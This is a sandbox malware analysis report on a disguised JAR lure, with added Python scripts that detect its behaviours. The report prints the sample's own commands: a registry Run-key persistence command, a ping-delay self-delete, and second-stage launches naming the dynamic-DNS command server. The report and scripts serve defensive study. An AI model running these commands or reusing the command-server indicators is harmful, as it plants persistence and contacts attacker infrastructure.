Windows Analysis Report
Avisierung vom 03.04.2025 Kundennummer 1084472.jar

Overview

General Information

Sample name: Avisierung vom 03.04.2025 Kundennummer 1084472.jar
Analysis ID: 1656232
MD5: 5b6cee019a5bcd56303094bb15787aac
SHA1: dfe538f5dcd7910b86f50eadd502810d2a6bddab
SHA256: a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd
Tags: jar, user-JAMESWT_WT

Detection

Score: 84
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Register Jar In Run Key
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Joe Sandbox ML detected suspicious sample
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected AllatoriJARObfuscator
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Shell Process Spawned by Java.EXE
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

(malware-category classification chart not reproduced in this text export)

Process tree:
  • System is w10x64
  • 7za.exe (PID: 7636 cmdline: 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • java.exe (PID: 7728 cmdline: java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 7816 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 5540 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5548 cmdline: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7448 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 5840 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 4692 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • java.exe (PID: 2964 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 4860 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5560 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 8000 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • cmd.exe (PID: 5868 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 6892 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
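
The process tree above shows three behaviours worth turning into detections: the second-stage java.exe spawning cmd.exe, reg.exe writing an HKCU Run value that relaunches a JAR from %AppData% via javaw, and a "ping localhost -n 6" delay followed by del to remove the staging JAR from %TEMP%. The second-stage java launches also carry the C2 host and port (jegjav.duckdns.org 1967) as plain command-line arguments. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it runs those heuristics over process-creation events constructed from the command lines above. The event schema (pid, ppid, image, cmdline), the user-writable path list, the two benign control events and the treatment of the arguments after host and port as opaque extras are assumptions.

```python
"""Endpoint heuristics for the behaviours in the process tree above.

Added example, not part of the sandbox report. Events are constructed from the
report's command lines; the (pid, ppid, image, cmdline) schema is an assumed
normalised form, not a real EDR format.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "pid tag detail")

# Constructed process-creation events. PIDs and command lines of the malicious
# chain are copied from the report; explorer.exe and the last two rows are
# benign controls that are made up.
EVENTS = [
    {"pid": 4000, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7728, "ppid": 4000, "image": "java.exe",
     "cmdline": r'java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE'},
    {"pid": 5540, "ppid": 7728, "image": "java.exe",
     "cmdline": r'"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""'},
    {"pid": 5548, "ppid": 5540, "image": "cmd.exe",
     "cmdline": r'cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""'},
    {"pid": 7448, "ppid": 5548, "image": "reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""'},
    {"pid": 5840, "ppid": 5540, "image": "cmd.exe",
     "cmdline": r'cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f'},
    {"pid": 100, "ppid": 4000, "image": "cmd.exe", "cmdline": "cmd /c dir"},
    {"pid": 101, "ppid": 4000, "image": "reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "C:\Program Files\Vendor\Updater.exe"'},
]

# Run / RunOnce key written by reg.exe (HKCU or HKLM, short or long hive name).
RUN_KEY_RE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)'
    r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b', re.I)
# java/javaw followed by -jar, tolerating the escaped quote seen in the report.
JAVA_JAR_RE = re.compile(r'javaw?(?:\.exe)?\\?"?\s+-jar\b', re.I)
# Assumed list of locations a persistence payload should not normally live in.
USER_WRITABLE_RE = re.compile(r'\\(?:AppData|Temp|ProgramData|Users\\Public)\\', re.I)
PING_SLEEP_RE = re.compile(r'\bping(?:\.exe)?\s+(?:localhost|127\.0\.0\.1|-n\s+\d+)', re.I)
DEL_AFTER_RE = re.compile(r'&&\s*(?:del|erase)\b', re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
JAVA = {"java.exe", "javaw.exe"}


def win_split(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted" spans whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_c2_args(cmdline):
    """Extract host and port from a 'java -jar <path> <host> <port> ...' launch.

    Positions follow the second-stage launches in the report; everything after
    the port is returned untouched as 'extra' because its meaning is not known.
    """
    tokens = win_split(cmdline)
    if "-jar" not in tokens:
        return None
    i = tokens.index("-jar")
    rest = tokens[i + 2:]
    if len(rest) < 2 or not rest[1].isdigit():
        return None
    return {"jar": tokens[i + 1], "host": rest[0], "port": int(rest[1]), "extra": rest[2:]}


def triage(events):
    """Apply the heuristics to every event and return the findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cmd, image = e["cmdline"], e["image"].lower()
        parent = by_pid.get(e["ppid"])
        if image in SHELLS and parent and parent["image"].lower() in JAVA:
            findings.append(Finding(e["pid"], "shell_spawned_by_java", parent["cmdline"][:60]))
        if RUN_KEY_RE.search(cmd) and JAVA_JAR_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
            findings.append(Finding(e["pid"], "run_key_jar_persistence", cmd))
        if PING_SLEEP_RE.search(cmd) and DEL_AFTER_RE.search(cmd):
            findings.append(Finding(e["pid"], "ping_sleep_self_delete", cmd))
        if image in JAVA:
            c2 = parse_c2_args(cmd)
            if c2:
                findings.append(Finding(e["pid"], "jar_c2_args", f'{c2["host"]}:{c2["port"]}'))
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f.pid, f.tag, f.detail)
```

The first-stage launch (PID 7728) deliberately yields nothing from parse_c2_args: its only argument after the JAR path is the token CXTKKfgE, so the host/port shape does not match. The benign reg.exe control is not flagged either, because the Run value it writes does not launch a JAR from a user-writable path.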
Source | Rule | Description | Author | Strings
Avisierung vom 03.04.2025 Kundennummer 1084472.jar | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
C:\Users\user\AppData\Local\Temp\lib\paexec.exe | tool_paexec_strings | Detects PAExec based on strings | Sekoia.io
  • 0x2a7a0:$: \\%s\%s\PAExec_Move%u.dat
  • 0x2a7b0:$: PAExec_Move%u.dat
  • 0x2a7d6:$: PAExec_Move%u.dat
  • 0x28a4c:$: PAExec returning exit code %d

Source | Rule | Description | Author | Strings
00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security
(30 memory-dump matches in total; the remainder are not reproduced in this export)
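
The Yara hits above rest on two static properties a practitioner can check before detonation: the Allatori obfuscator marker (the report lists the string http://www.allatori.com in the sample and in every dropped JAR) and a native Windows executable shipped inside a Java archive (lib/paexec.exe, a PAExec build, was written from the second stage). The Python below is an added example for this page, not code from the report, from Joe Security or from the rule authors: it walks a JAR as a zip, reads the Main-Class, counts class files, and flags entries that carry the Allatori marker or start with an MZ header. The JAR it inspects is constructed in memory from fake entries so the script runs offline; the "ALLATORIxDEMO" constant is the marker the Allatori demo build leaves in class files and is an assumption here, not something this report shows.

```python
"""Static triage of a JAR before detonation.

Added example, not part of the sandbox report. Flags the two things the
report's Yara rules keyed on: the Allatori marker string and embedded PE
files. The sample JAR is constructed in memory so this runs offline.
"""
import hashlib
import io
import zipfile

# The URL is the marker the report shows; "ALLATORIxDEMO" is the constant the
# Allatori demo build leaves in class files (assumption, not from the report).
ALLATORI_MARKERS = (b"http://www.allatori.com", b"ALLATORIxDEMO")
CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # Java class-file magic
PE_MAGIC = b"MZ"                    # DOS/PE header magic


def build_sample_jar():
    """Construct a small fake JAR: a manifest, two classes (one Allatori-marked)
    and an embedded PE stub under lib/, mirroring the layout seen in the report."""
    entries = {
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\r\nMain-Class: a.b\r\n\r\n",
        "a/b.class": CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 16
                     + b"# Obfuscation by Allatori Obfuscator http://www.allatori.com",
        "a/c.class": CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 16,
        "lib/paexec.exe": PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 32,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            # Fixed timestamp so the archive (and its hash) is reproducible.
            info = zipfile.ZipInfo(name, date_time=(2025, 4, 3, 0, 0, 0))
            z.writestr(info, data)
    return buf.getvalue()


def triage_jar(data):
    """Summarise a JAR given as bytes: hash, Main-Class, class count and the
    entries that match the Allatori marker or carry a PE header."""
    report = {"sha256": hashlib.sha256(data).hexdigest(), "main_class": None,
              "classes": 0, "allatori": [], "embedded_pe": [], "other": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            blob = z.read(info)
            name = info.filename
            if name == "META-INF/MANIFEST.MF":
                for line in blob.decode("utf-8", "replace").splitlines():
                    if line.startswith("Main-Class:"):
                        report["main_class"] = line.split(":", 1)[1].strip()
            elif blob.startswith(CLASS_MAGIC):
                report["classes"] += 1
            elif blob.startswith(PE_MAGIC):
                report["embedded_pe"].append(name)   # native binary inside a Java archive
            else:
                report["other"].append(name)
            if any(marker in blob for marker in ALLATORI_MARKERS):
                report["allatori"].append(name)
    report["suspicious"] = bool(report["allatori"] or report["embedded_pe"])
    return report


if __name__ == "__main__":
    for key, value in triage_jar(build_sample_jar()).items():
        print(f"{key}: {value}")
```

On a real sample, pass the file's bytes to triage_jar and compare the sha256 with the hashes in the General Information block; an archive whose Main-Class resolves to an Allatori-marked class and which also carries an MZ-headed entry under lib/ matches the shape of this sample.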

System Summary

Source: Process started
Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
Data:
  • Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine|base64offset|contains:
  • Image: C:\Windows\SysWOW64\reg.exe
  • NewProcessName: C:\Windows\SysWOW64\reg.exe
  • OriginalFileName: C:\Windows\SysWOW64\reg.exe
  • ParentCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • ParentImage: C:\Windows\SysWOW64\cmd.exe
  • ParentProcessId: 5548
  • ParentProcessName: cmd.exe
  • ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • ProcessId: 7448
  • ProcessName: reg.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data:
  • Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine|base64offset|contains: rg
  • Image: C:\Windows\SysWOW64\cmd.exe
  • NewProcessName: C:\Windows\SysWOW64\cmd.exe
  • OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  • ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
  • ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
  • ParentProcessId: 5540
  • ParentProcessName: java.exe
  • ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • ProcessId: 5548
  • ProcessName: cmd.exe

Source: Process started
Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
Data:
  • Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine|base64offset|contains: rg
  • Image: C:\Windows\SysWOW64\cmd.exe
  • NewProcessName: C:\Windows\SysWOW64\cmd.exe
  • OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  • ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
  • ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
  • ParentProcessId: 5540
  • ParentProcessName: java.exe
  • ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • ProcessId: 5548
  • ProcessName: cmd.exe

Persistence and Installation Behavior

Source: Process started
Author: Joe Security
Data:
  • Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • CommandLine|base64offset|contains: rg
  • Image: C:\Windows\SysWOW64\cmd.exe
  • NewProcessName: C:\Windows\SysWOW64\cmd.exe
  • OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  • ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
  • ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
  • ParentProcessId: 5540
  • ParentProcessName: java.exe
  • ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
  • ProcessId: 5548
  • ProcessName: cmd.exe

No Suricata rule has matched


AV Detection

Source: Submitted Sample | Neural Call Log Analysis: 85.3%
Source: Binary string: D:\GitHub\PAExec\Release\PAExec.pdb source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\System32\conhost.exe
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 4x nop then cmp eax, dword ptr [ecx+04h]

Networking

Source: unknown | DNS query: name: jegjav.duckdns.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
Source: global traffic | TCP traffic: 192.168.2.4:49716 -> 128.90.145.126:1967
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: PHMGMT-AS1US
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 | Connection: close
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 | Connection: close
Source: global traffic | DNS traffic detected: DNS query: jegjav.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
